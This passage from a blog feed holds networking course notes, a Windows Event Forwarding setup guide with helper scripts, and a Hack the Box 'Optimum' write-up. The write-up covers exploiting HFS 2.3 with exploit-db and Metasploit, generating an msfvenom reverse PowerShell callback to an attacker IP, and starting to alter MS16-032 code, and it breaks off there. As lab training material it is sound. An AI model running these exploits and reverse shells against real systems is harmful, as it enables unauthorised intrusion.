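    if ($octets.Count -ne 6) { throw "Expected a 48-bit MAC address, got: $Mac" }

    # 1. break the MAC in half and 2. insert ff:fe in the middle: a 64-bit interface identifier
    $iid = @($octets[0..2]) + @([byte]0xFF, [byte]0xFE) + @($octets[3..5])
    # 3. flip the 7th bit of the first byte: the universal/local bit, value 0x02
    $iid[0] = [byte]($iid[0] -bxor 0x02)

    $hextets = 0..3 | ForEach-Object { '{0:x2}{1:x2}' -f $iid[2 * $_], $iid[2 * $_ + 1] }
    # link-local prefix fe80::/64 plus the identifier; leading zeros in each hextet are dropped
    $compact = $hextets | ForEach-Object { $_.TrimStart('0') -replace '^$', '0' }
    [pscustomobject]@{
        Mac         = $Mac
        InterfaceId = $hextets -join ':'
        LinkLocal   = 'fe80::' + ($compact -join ':')
    }
}

# made-up sample inputs
Get-IPv4Network -Cidr '10.1.1.0/24'
Get-IPv4Network -Cidr '192.168.1.77/26'
ConvertTo-Eui64LinkLocal -Mac '00:1A:2B:3C:4D:5E'
```

<p>The EUI-64 function is also a reminder of why the outline notes that Windows uses a random interface identifier instead: an address derived from the MAC exposes the hardware address (and therefore the vendor and a stable host identifier) to every IPv6 peer the host talks to.</p>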

<h2 id="ethernet-and-switching">Ethernet and Switching</h2>

<ul>
  <li>Layer 2 allows traffic between devices</li>
  <li>Carrier Sense Multiple Access with Collision Detection (CSMA/CD)
    <ul>
      <li>Collision Domain</li>
    </ul>
  </li>
  <li>Duplex and speed
    <ul>
      <li>Half Duplex – one device communicates at a time
        <ul>
          <li>Walkie-talkie</li>
        </ul>
      </li>
      <li>Full Duplex – simultaneous communication between devices
        <ul>
          <li>Telephone</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>Modern Collision Domain</li>
  <li>Ethernet Speed
    <ul>
      <li>GigabitEthernet speeds require full duplex</li>
    </ul>
  </li>
  <li>Ethernet II Frame
    <ul>
      <li>Destination MAC Address (48 bits)</li>
      <li>Source MAC Address (48 bits)</li>
      <li>Type (16 bits)</li>
      <li>Data (46–1500 bytes)</li>
      <li>FCS (32 bits)</li>
    </ul>
  </li>
</ul>

<h2 id="network-topologies">Network Topologies</h2>

<ul>
  <li>BUS</li>
  <li>Ring</li>
  <li>Star</li>
</ul>

<h2 id="switch">Switch</h2>

<ul>
  <li>MAC Address Table</li>
  <li>Broadcast
    <ul>
      <li>Layer 2 Broadcast address
        <ul>
          <li>Destination MAC address is ff:ff:ff:ff:ff:ff</li>
        </ul>
      </li>
      <li>Broadcast domain – the group of devices that receive each other’s broadcasts (a LAN segment or VLAN)</li>
    </ul>
  </li>
  <li>Features
    <ul>
      <li>Broadcast storms prevention</li>
      <li>VLANs</li>
      <li>Mirroring switch ports</li>
    </ul>
  </li>
  <li>Connecting Switches
    <ul>
      <li>Broadcast Messages</li>
      <li>Broadcast Storm</li>
      <li>Spanning Tree Protocols
        <ul>
          <li>Blocks redundant links to prevent loops (and the broadcast storms they cause)</li>
        </ul>
      </li>
    </ul>
  </li>
  <li>VLANs (Broadcast Domain)
    <ul>
      <li>Trunk Link – connects switches that are using VLANs</li>
      <li>Adds a tag to each frame identifying the destination VLAN (802.1Q)</li>
      <li>Also called tagged ports</li>
      <li>Trunklinks/Access links</li>
    </ul>
  </li>
  <li>Switch Port Mirroring
    <ul>
      <li>Collects traffic to analyze problems within network</li>
      <li>Mirror the traffic of any port that we want</li>
    </ul>
  </li>
</ul>

<h2 id="power-over-ethernet-poe">Power over Ethernet (POE)</h2>

<ul>
  <li>Gives power to connected devices</li>
</ul>

<h2 id="ip-routing">IP Routing</h2>

<ul>
  <li>Routers
    <ul>
      <li>At least 2 interfaces to operate
        <ul>
          <li>Each on a different IP network</li>
        </ul>
      </li>
      <li>IP Packet
<img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/03/ip-packet.png?resize=499%2C283&amp;ssl=1" alt="IP Packet" /></li>
    </ul>
  </li>
  <li>ARP (Address Resolution Protocol, sits between Layer 2 and Layer 3)
    <ul>
      <li>Retrieves a Layer 2 (MAC) address for a known Layer 3 (IP) address</li>
      <li>Each device maintains an ARP cache; entries age out</li>
      <li>Bridges L2 and L3</li>
    </ul>
  </li>
  <li>Default Gateway (Router)
    <ul>
      <li>A host ARPs for the default gateway’s MAC when the destination is on another network</li>
      <li>Every router needs a route (or a default route) that forwards traffic to the right next hop</li>
      <li>Each time a packet traverses a router, its TTL is decreased by 1</li>
      <li>Static Routing</li>
      <li>Dynamic Routing
        <ul>
          <li>Routing Protocols
            <ul>
              <li>RIP</li>
              <li>EIGRP</li>
              <li>OSPF</li>
              <li>BGP</li>
            </ul>
          </li>
        </ul>
      </li>
    </ul>
  </li>
  <li>Tools
    <ul>
      <li>tracert (traceroute)</li>
    </ul>
  </li>
</ul>

<h2 id="network-services">Network Services</h2>

<ul>
  <li>Network Topologies
    <ul>
      <li>LAN/WLAN</li>
      <li>WAN
        <ul>
          <li>CAN</li>
          <li>MAN</li>
        </ul>
      </li>
      <li>SAN</li>
      <li>PAN</li>
    </ul>
  </li>
</ul>

<h2 id="network-address-translation">Network Address Translation</h2>

<ul>
  <li>To communicate with the Internet</li>
  <li>What it does
    <ul>
      <li>Temporarily change the private source IP to a public source IP address</li>
    </ul>
  </li>
  <li>Port Address Translation</li>
</ul>

<h2 id="port-forwarding">Port Forwarding</h2>

<ul>
  <li>Socket – IP:PORT
    <ul>
      <li>192.168.1.1:1337</li>
    </ul>
  </li>
</ul>

<h2 id="access-control-lists">Access Control Lists</h2>

<ul>
  <li>Allow/Deny destination or source IP addresses</li>
</ul>

<h2 id="dhcp">DHCP</h2>

<ul>
  <li>Client broadcasts a DHCP Discover</li>
  <li>Server replies with a DHCP Offer</li>
  <li>Client sends a DHCP Request and the server answers with a DHCP Ack (DORA)</li>
  <li>DHCP Binding – the server’s record of the lease</li>
  <li>IP Helper Address – a router forwards DHCP broadcasts to a server on another subnet</li>
</ul>

<h2 id="dns-hierarchy">DNS Hierarchy</h2>

<ul>
  <li>Parts of a domain name in a URL (reading from right to left)
    <ul>
      <li>TLD (.com, .net, .org)</li>
      <li>SLD (google.com, trendmicro.com)</li>
      <li>Third-level domain (www)</li>
      <li>Subdomain (www.xxx.trendmicro.com)</li>
    </ul>
  </li>
  <li>Reverse DNS Lookup – IP address to name, answered from PTR records</li>
  <li>DNS Record Types
    <ul>
      <li>A – IPv4 Record</li>
      <li>AAAA – IPv6 Record</li>
      <li>CNAME – Canonical Name Record (Alias)</li>
      <li>MX – Mail Exchange Record</li>
      <li>NS – Identifies Authoritative Name Server</li>
      <li>PTR – Pointer Record</li>
      <li>SRV – Service Record</li>
      <li>TXT – miscellaneous use</li>
    </ul>
  </li>
</ul>

<h2 id="internal-vs-external-dns">Internal vs External DNS</h2>

<ul>
  <li>Internal domain name system zone</li>
  <li>External domain name system zone
    <ul>
      <li>Uses Internet’s DNS</li>
    </ul>
  </li>
</ul>

<p><strong>Course Reference:</strong></p>

<p><a href="https://app.pluralsight.com/library/courses/comptia-network-plus-networking-concepts/">Pluralsight – Networking Concepts and Protocols</a></p>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[This blog post contains the Networking Concepts and Protocols course that can be enrolled in Pluralsight. Feel free to skim this outline to get a high-level overview of the topics that were discuss…]]></summary></entry><entry><title type="html">Poor man’s log collection on Windows</title><link href="https://blog.anotsodev.me/2020/03/27/poor-man-s-log-collection-on-windows.html" rel="alternate" type="text/html" title="Poor man’s log collection on Windows" /><published>2020-03-27T00:00:00+00:00</published><updated>2020-03-27T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2020/03/27/poor-man-s-log-collection-on-windows</id><content type="html" xml:base="https://blog.anotsodev.me/2020/03/27/poor-man-s-log-collection-on-windows.html"><![CDATA[<h2 id="introduction">Introduction</h2>

<p>As your organization grows, more and more log collectors, commercial or freeware, need to be installed on your network to get logs from the different Windows and *nix servers.</p>

<p>Let’s say, for example, that an organization called <strong>kyle.biz</strong> has deployed ArcSight SmartConnectors on Linux servers to collect Windows event logs. Based on my experience, setting up the SmartConnectors is tedious and maintaining them is sometimes a pain.</p>

<p>They also have a limitation: a SmartConnector only pulls logs from the static server IPs configured during installation, so there is no way to get logs from machines that have dynamic IPs.</p>

<p>Upon research, our team stumbled upon this article on Microsoft’s <a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection">documentation page</a> and saw that Windows already has a built-in log forwarding feature, which is powerful and easy to configure!</p>

<p>So without further ado, let’s configure source-initiated Windows Event Collection (WEC) and Windows Event Forwarding (WEF) on our servers!</p>

<h2 id="prerequisites">Prerequisites</h2>

<p><strong>Windows Event Collector</strong></p>

<ul>
  <li><strong>OS:</strong> Windows Server 2016</li>
  <li><strong>Hostname:</strong> WEC01.internal.kyle.biz</li>
  <li><strong>RAM:</strong> 16GB</li>
  <li><strong>CPU:</strong> 4 Cores</li>
  <li><strong>Storage:</strong>
    <ul>
      <li>Drive C:\ – 50GB</li>
      <li>Drive D:\ – 60GB (we’ll save our forwarded logs here)</li>
    </ul>
  </li>
  <li>Joined in a domain.</li>
</ul>

<p><strong>Windows Event Source</strong></p>

<ul>
  <li><strong>OS:</strong> Windows Server 2016</li>
  <li><strong>Hostname:</strong> CONSOLESERVER01.internal.kyle.biz</li>
  <li>Joined in a domain.</li>
</ul>

<h2 id="wec-server-configuration">WEC Server Configuration</h2>

<p>In the following steps, we’ll configure our collector server to receive the logs that the source computers will push to it.</p>

<p><strong>Step 1:</strong> Open the Event Viewer and click <strong>Subscriptions</strong>.</p>

<p><strong>Step 2:</strong> Right-click Subscriptions to create a new subscription. The other available actions are listed in the right pane of the window.</p>

<p><img src="https://i1.wp.com/anotsodev.me/wp-content/uploads/2020/03/image-8.png?fit=818%2C490&amp;ssl=1" alt="" /></p>

<p><strong>Step 3</strong>: Enter the subscription name and select the subscription type as <strong>Source computer initiated.</strong></p>

<p><em>Before we proceed in adding <strong>computer groups,</strong> let’s first configure the events to collect and advanced settings.</em></p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/03/image-4.png?resize=574%2C559&amp;ssl=1" alt="" /></p>

<p><strong>Step 4:</strong> Click <strong>Select Events</strong>, switch to the <strong>XML</strong> tab, tick <strong>Edit query manually</strong>, and paste the XML query from here: <a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection#appendix-e--annotated-baseline-subscription-event-query">Appendix E – Annotated baseline subscription event query</a></p>

<p><strong>Step 5:</strong> Click OK</p>

<p><strong>Step 6:</strong> Click <strong>Advanced</strong> and select <strong>Minimize Latency</strong> as the event delivery optimization.</p>

<p><strong>Step 7:</strong> Click OK</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/03/image-1.png?resize=581%2C557&amp;ssl=1" alt="" /></p>

<p><strong>Step 8:</strong> We’ll now add our domain computers by clicking <strong>Select Computer Groups</strong>.</p>

<p><strong>Step 9:</strong> Since we are joined to a domain, click <strong>Add Domain Computers</strong> and search for the hostname of the event source (e.g. CONSOLESERVER01.internal.kyle.biz).</p>

<p><strong>Step 10:</strong> Click OK</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/03/image-7.png?resize=619%2C606&amp;ssl=1" alt="" /></p>

<p><strong>Step 11:</strong> Right-click <strong>Forwarded Events</strong> and click <strong>Properties</strong>.</p>

<p><strong>Step 12:</strong> Create the folder <strong>Winevt\Logs</strong> on drive D:\ and replace the log path with <strong>D:\Winevt\Logs\ForwardedEvents.evtx</strong>, as in the screenshot below. This keeps the forwarded log off the system drive, which matters once many sources are pushing events.</p>

<p><img src="https://i2.wp.com/anotsodev.me/wp-content/uploads/2020/03/image-6.png?fit=818%2C537&amp;ssl=1" alt="" /></p>

<h2 id="event-source-configuration">Event Source Configuration</h2>

<p>In the following steps, we’ll configure the source computers to forward logs to our collector server.</p>

<p><strong>Step 1:</strong> On the event source server, we point the Subscription Manager setting at our <strong>WEC</strong>.</p>

<p><strong>Step 2:</strong> Open the Local Group Policy Editor and navigate to <strong>Computer Configuration &gt; Administrative Templates &gt; Windows Components &gt; Event Forwarding</strong> to see the settings in that folder.</p>

<p><img src="https://i0.wp.com/anotsodev.me/wp-content/uploads/2020/03/image.png?fit=818%2C451&amp;ssl=1" alt="" /></p>

<p><strong>Step 3:</strong> Open <strong>Configure target Subscription Manager</strong>, set it to <strong>Enabled</strong>, click <strong>Show</strong> and enter the following value (port 5985 is WinRM over HTTP; <code class="language-plaintext highlighter-rouge">Refresh=60</code> makes the source re-read its subscriptions from the collector every 60 seconds):</p>

<p><code class="language-plaintext highlighter-rouge">Server=http://WEC01.internal.kyle.biz:5985/wsman/SubscriptionManager/WEC,Refresh=60</code></p>

<p><strong>Step 4:</strong> Click OK</p>

<p><img src="https://i1.wp.com/anotsodev.me/wp-content/uploads/2020/03/image-3.png?fit=818%2C411&amp;ssl=1" alt="" /></p>

<p><strong>Step 5:</strong> Open a Command Prompt and enter <em><code class="language-plaintext highlighter-rouge">gpupdate /force</code></em> to apply the change to the local group policy.</p>

<p><strong>Step 6:</strong> Press Enter</p>

<p><img src="https://i2.wp.com/anotsodev.me/wp-content/uploads/2020/03/image-2.png?fit=818%2C463&amp;ssl=1" alt="" /></p>

<p><strong>Step 7:</strong> Go back to the WEC server and check whether the Baseline subscription is already receiving events from our event source machine.</p>

<p><img src="https://i1.wp.com/anotsodev.me/wp-content/uploads/2020/03/image-5.png?fit=818%2C518&amp;ssl=1" alt="" /></p>

<p><strong>Step 8:</strong> The events are now being forwarded and are ready to use for analysis.</p>

<p><img src="https://i1.wp.com/anotsodev.me/wp-content/uploads/2020/03/image-9.png?fit=818%2C534&amp;ssl=1" alt="" /></p>
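<p>The twelve collector steps and the eight source steps above are what the GUI does for you; on more than a handful of hosts you will want the same configuration as text you can review, version and load with <code>wecutil cs</code>. The script below is an added example, not part of the original post: it builds the Subscription Manager policy value for the source and a source-initiated subscription XML for the collector, then reads the XML back so the fields can be checked before loading it. The SDDL constant allows all Domain Computers and Domain Controllers to forward, rather than the single host picked in Step 9, and the event query is a small constructed one standing in for the Appendix E baseline; both are assumptions of the example. Two things the GUI walkthrough does not mention and that no script can do for you: WinRM must be listening on the source (<code>winrm quickconfig</code>) and the collector service must be configured (<code>wecutil qc</code>), and the source’s NETWORK SERVICE account needs read access to the Security log, usually by adding it to the Event Log Readers group, or Security events will never arrive.</p>

```python
"""Build the two artefacts of a source-initiated WEF setup as text.

Added example: it produces the Subscription Manager policy value for the
source and a subscription XML the collector can load with
'wecutil cs subscription.xml'; it does not touch the registry or wecutil.
"""
import xml.etree.ElementTree as ET

WEF_NS = "http://schemas.microsoft.com/2006/03/windows/events/subscription"
# SDDL allowing Domain Computers (DC) and Domain Controllers (DD) to forward.
# Assumption: the post picks a single host in the GUI; this is the group-wide form.
DOMAIN_COMPUTERS_SDDL = "O:NSG:NSD:(A;;GA;;;DC)(A;;GA;;;DD)"


def subscription_manager_value(collector_fqdn, port=5985, refresh=60, https=False):
    """'Configure target Subscription Manager' value: 5985 is WinRM over HTTP
    (5986 for HTTPS); Refresh is how often, in seconds, the source re-reads
    its subscriptions from the collector."""
    scheme = "https" if https else "http"
    return "Server=%s://%s:%d/wsman/SubscriptionManager/WEC,Refresh=%d" % (
        scheme, collector_fqdn, port, refresh)


def baseline_query(event_ids_by_log):
    """Minimal QueryList (constructed here; the post uses Microsoft's Appendix E)."""
    qlist = ET.Element("QueryList")
    for idx, (log, ids) in enumerate(sorted(event_ids_by_log.items())):
        query = ET.SubElement(qlist, "Query", Id=str(idx), Path=log)
        select = ET.SubElement(query, "Select", Path=log)
        select.text = "*[System[(%s)]]" % " or ".join("EventID=%d" % i for i in ids)
    return ET.tostring(qlist, encoding="unicode")


def subscription_xml(name, query_xml, allowed_sddl=DOMAIN_COMPUTERS_SDDL, min_latency=True):
    """Source-initiated subscription in the format wecutil expects.
    Element order follows Microsoft's sample; MinLatency matches the
    'Minimize Latency' choice in the GUI. The query is stored as escaped
    text rather than a CDATA section (assumption: parsers treat both alike)."""
    root = ET.Element("Subscription")
    root.set("xmlns", WEF_NS)
    fields = [
        ("SubscriptionId", name),
        ("SubscriptionType", "SourceInitiated"),
        ("Description", "Baseline events pushed by domain computers"),
        ("Enabled", "true"),
        ("Uri", "http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog"),
        ("ConfigurationMode", "MinLatency" if min_latency else "Normal"),
        ("Query", query_xml),
        ("ReadExistingEvents", "false"),
        ("TransportName", "http"),
        ("ContentFormat", "RenderedText"),
    ]
    for tag, text in fields:
        ET.SubElement(root, tag).text = text
    ET.SubElement(root, "Locale", Language="en-US")
    ET.SubElement(root, "LogFile").text = "ForwardedEvents"
    ET.SubElement(root, "AllowedSourceNonDomainComputers")
    ET.SubElement(root, "AllowedSourceDomainComputers").text = allowed_sddl
    return ET.tostring(root, encoding="unicode")


def parse_subscription(xml_text):
    """Read back the fields worth checking before running 'wecutil cs'."""
    root = ET.fromstring(xml_text)
    ns = {"s": WEF_NS}

    def text_of(tag):
        element = root.find("s:" + tag, ns)
        return None if element is None else element.text

    return {
        "id": text_of("SubscriptionId"),
        "type": text_of("SubscriptionType"),
        "mode": text_of("ConfigurationMode"),
        "log": text_of("LogFile"),
        "sddl": text_of("AllowedSourceDomainComputers"),
        "query_paths": [q.get("Path") for q in ET.fromstring(text_of("Query")).iter("Query")],
    }


if __name__ == "__main__":
    print(subscription_manager_value("WEC01.internal.kyle.biz"))
    query = baseline_query({"Security": [4624, 4625, 4688], "System": [7045]})
    xml_text = subscription_xml("Baseline", query)
    print(xml_text)
    print(parse_subscription(xml_text))
```

<p>Save the printed XML and run <code>wecutil cs subscription.xml</code> on the collector; the policy value goes into the Subscription Manager setting exactly as in Step 3 of the source configuration. Switching <code>https=True</code> and port 5986 requires a server certificate on the collector, so keep the HTTP form unless that is already in place.</p>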

<p>So that’s it! I hope you learned something new today and that you’ll use this example to close the gap and gain greater visibility into your network.</p>

<h2 id="references">References:</h2>

<ul>
  <li><a href="https://docs.microsoft.com/en-us/windows/threat-protection/use-windows-event-forwarding-to-assist-in-instrusion-detection">https://docs.microsoft.com/en-us/windows/threat-protection/use-windows-event-forwarding-to-assist-in-instrusion-detection</a></li>
  <li><a href="https://docs.microsoft.com/en-us/windows/win32/wec/setting-up-a-source-initiated-subscription">https://docs.microsoft.com/en-us/windows/win32/wec/setting-up-a-source-initiated-subscription</a></li>
</ul>]]></content><author><name>[&quot;anotsodev&quot;]</name></author><summary type="html"><![CDATA[Introduction As your organization grows, a lot more log collectors either commercial or freeware are needed to be installed on your network to get logs from different servers running on Windows or …]]></summary></entry><entry><title type="html">Hack the Box Optimum</title><link href="https://blog.anotsodev.me/2017/10/28/hack-the-box-optimum.html" rel="alternate" type="text/html" title="Hack the Box Optimum" /><published>2017-10-28T00:00:00+00:00</published><updated>2017-10-28T00:00:00+00:00</updated><id>https://blog.anotsodev.me/2017/10/28/hack-the-box-optimum</id><content type="html" xml:base="https://blog.anotsodev.me/2017/10/28/hack-the-box-optimum.html"><![CDATA[<p>This is a write-up of the retired Optimum box on Hack the Box.</p>

<p>The first thing I did was fire up nmap and run this command.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -sV -sC -oA optimum 10.10.10.8
</code></pre></div></div>

<p>And got this result.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Nmap scan report for 10.10.10.8
Host is up (0.42s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.77 seconds
</code></pre></div></div>

<p>So only port 80 was open, and it was running HttpFileServer (HFS).</p>

<p><em><strong>HTTP File Server</strong>, otherwise known as HFS, is a free web server specifically designed for publishing and sharing files. The complete feature set differs from other web servers; it lacks some common features, like CGI, or even ability to run as a Windows service, but includes, for example, counting file downloads. It is even advised against using it as an ordinary web server.</em></p>

<p><em>Source:</em> https://en.wikipedia.org/wiki/HTTP_File_Server</p>

<p>I opened the service in a web browser and it was just the HFS dashboard.</p>

<p>The HFS version was 2.3, so I looked it up with searchsploit.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/Documents/HTB/Optimum# searchsploit hfs
------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title | Path
 | (/usr/share/exploitdb/platforms/)
------------------------------------------------------------------------------------------------- ----------------------------------
Apple Mac OSX 10.4.8 - DMG HFS+ DO_HFS_TRUNCATE Denial of Service | osx/dos/29454.txt
Apple Mac OSX 10.6 - HFS FileSystem Exploit (Denial of Service) | osx/dos/12375.c
Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure | osx/local/35488.c
Apple Mac OSX xnu 1228.x - (hfs-fcntl) Kernel Privilege Escalation | osx/local/8266.txt
FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution | windows/remote/37985.py
Linux Kernel 2.6.x - SquashFS Double-Free Denial of Service | linux/dos/28895.txt
Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit) | windows/remote/34926.rb
Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities | windows/remote/31056.py
Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | multiple/remote/30850.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | windows/remote/34668.txt
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | windows/remote/39161.py
Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | windows/webapps/34852.txt
------------------------------------------------------------------------------------------------- ----------------------------------
</code></pre></div></div>

<p>So there were multiple exploits available for HFS version 2.3.</p>

<p>The first exploit that I used was this.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | windows/remote/39161.py
</code></pre></div></div>

<p>I copied the exploit into my working directory as exploit.py, then modified a few lines to set my IP address and the local port to listen on.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/Documents/HTB/Optimum# nano exploit.py

# changed the following lines
ip_addr = "10.10.14.116" #local IP address
local_port = "9999" # Local Port number

root@kali:~/Documents/HTB/Optimum# python exploit.py 
[.]Something went wrong..!
Usage is :[.] python exploit.py &lt;Target IP address&gt; &lt;Target Port Number&gt;
Don't forgot to change the Local IP address and Port number on the script
root@kali:~/Documents/HTB/Optimum# python exploit.py 10.10.10.8 80

# Open new Terminal Tab
root@kali:~/Documents/HTB/Optimum# nc -lvp 9999
</code></pre></div></div>

<p>After running the exploit with a netcat listener open in another terminal, I got a shell. So the exploit worked, but the plain shell was limited, and I wanted a Meterpreter session so I could run the local exploit suggester and use the suggested privilege-escalation exploits to get SYSTEM (the Windows equivalent of root) on the box.</p>

<p>Luckily there was a Metasploit module for the HFS exploit, so I fired up Metasploit and used it.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf &gt; search hfs

Matching Modules
================

Name Disclosure Date Rank Description
 ---- --------------- ---- -----------
 exploit/multi/http/git_client_command_exec 2014-12-18 excellent Malicious Git and Mercurial HTTP Server For CVE-2014-9390
 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Rejetto HttpFileServer Remote Command Execution
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf &gt; use exploit/windows/http/rejetto_hfs_exec
msf exploit(rejetto_hfs_exec) &gt; set RHOST 10.10.10.8
RHOST =&gt; 10.10.10.8
msf exploit(rejetto_hfs_exec) &gt; set SRVPORT 7777
SRVPORT =&gt; 7777
msf exploit(rejetto_hfs_exec) &gt; run

[*] Started reverse TCP handler on 10.10.14.116:4444 
[*] Using URL: http://0.0.0.0:7777/YqQuLmjEaXD
[*] Local IP: http://192.168.8.102:7777/YqQuLmjEaXD
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /YqQuLmjEaXD
[*] Sending stage (179267 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.14.116:4444 -&gt; 10.10.10.8:49239) at 2017-10-14 09:51:34 -0400
[*] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\pCrVCNhk.vbs' on the target
</code></pre></div></div>

<p>Got a meterpreter session.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>meterpreter &gt;
meterpreter &gt; sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
</code></pre></div></div>

<p>I needed to background the session first so that I could run the exploit suggester against it.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>meterpreter &gt; background
[*] Backgrounding session 1...

msf exploit(rejetto_hfs_exec) &gt; search suggester

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
post/multi/recon/local_exploit_suggester normal Multi Recon Local Exploit Suggester

msf exploit(rejetto_hfs_exec) &gt; use post/multi/recon/local_exploit_suggester
msf post(local_exploit_suggester) &gt; set SESSION 1
SESSION =&gt; 1
msf post(local_exploit_suggester) &gt; run

[*] 10.10.10.8 - Collecting local exploits for x86/windows...
[*] 10.10.10.8 - 37 exploit checks are being tried...
[+] 10.10.10.8 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.8 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.8 - exploit/windows/local/ms_ndproxy: The target service is running, but could not be validated.
[*] Post module execution completed
msf post(local_exploit_suggester) &gt; use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf exploit(ms16_032_secondary_logon_handle_privesc) &gt; 
msf exploit(ms16_032_secondary_logon_handle_privesc) &gt; run
msf exploit(ms16_032_secondary_logon_handle_privesc) &gt; set SESSION 2
[*] Started reverse TCP handler on 192.168.8.102:4444 
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\Desktop\cbOzoCyJAykO.txt...
[*] Compressing script contents...
[+] Compressed size: 3596
[*] Executing exploit script...

[+] Cleaned up C:\Users\kostas\Desktop\cbOzoCyJAykO.txt
[*] Exploit completed, but no session was created.
msf exploit(ms16_032_secondary_logon_handle_privesc) &gt;
</code></pre></div></div>

<p>The ms16_032_secondary_logon_handle_privesc module targets Windows 2012 R2 (Build 9600), but it didn’t work and no session was created. Note that the handler started on 192.168.8.102:4444, the LAN address, rather than the 10.10.14.116 VPN address, so a callback from the target could never have reached it; setting LHOST explicitly is worth trying before giving up on the module. There is also a manual exploit script for MS16-032, and I used that to get SYSTEM on the box.</p>

<p>So I downloaded the exploit from exploit-db.</p>

<p>https://www.exploit-db.com/exploits/39719/</p>

<p>The exploit is a PowerShell script, so to run it I needed interactive PowerShell access on the system. I created a reverse PowerShell payload with msfvenom.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@kali:~/Documents/HTB/Optimum# msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.116 LPORT=5555 -f exe &gt; shell.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1802 bytes
Final size of exe file: 8192 bytes
</code></pre></div></div>

<p>After creating the payload, I started a handler in Metasploit in another tab to catch the reverse PowerShell.</p>

<p>Reverse Powershell Tab</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf &gt; use exploit/multi/handler
msf exploit(handler) &gt; set payload payload/windows/x64/powershell_reverse_tcp
[-] The value specified for payload is not valid.
msf exploit(handler) &gt; set payload windows/x64/powershell_reverse_tcp
payload =&gt; windows/x64/powershell_reverse_tcp
msf exploit(handler) &gt; set LHOST 10.10.14.116
LHOST =&gt; 10.10.14.116
msf exploit(handler) &gt; set LPORT 5555
LPORT =&gt; 5555
msf exploit(handler) &gt; exploit -j -z
[*] Exploit running as background job 0.
msf exploit(handler) &gt; 
[*] Started reverse SSL handler on 10.10.14.116:5555

msf exploit(handler) &gt;
</code></pre></div></div>

<p>After creating the handler I uploaded and executed the reverse powershell.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>meterpreter &gt; pwd
C:\Users\kostas\Desktop
meterpreter &gt; upload shell.exe
[*] uploading : shell.exe -&gt; shell.exe
[*] uploaded : shell.exe -&gt; shell.exe
meterpreter &gt; execute -f shell.exe
</code></pre></div></div>

<p>On the Reverse Powershell Tab, I got a powershell session.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msf exploit(handler) &gt; [*] Powershell session session 2 opened (10.10.14.116:5555 -&gt; 10.10.10.8:49251) at 2017-10-14 10:22:40 -0400
</code></pre></div></div>

<p>Now it was time to modify the MS16-032 script so it would work for us. The script spawns a process as SYSTEM with CreateProcessWithLogonW, and by default that process is cmd.exe.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
        $CallResult = [Advapi32]::CreateProcessWithLogonW(
            "user", "domain", "pass",
            0x00000002, "C:\Windows\System32\cmd.exe", "", #change this to your reverse shell.
            0x00000004, $null, $GetCurrentPath,
